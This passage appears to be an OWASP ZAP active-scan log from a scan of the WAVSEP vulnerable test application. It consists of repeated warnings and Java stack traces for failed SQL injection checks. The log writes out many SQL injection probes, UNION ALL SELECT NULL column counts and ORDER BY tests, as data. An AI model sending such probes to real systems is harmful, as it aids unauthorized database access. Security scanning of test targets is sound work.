SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679544 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679545 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679545 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679547 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679547 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679548 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679549 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679550 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679550 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679551 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 1400#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' ORDER BY 1400# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679551 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679553 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 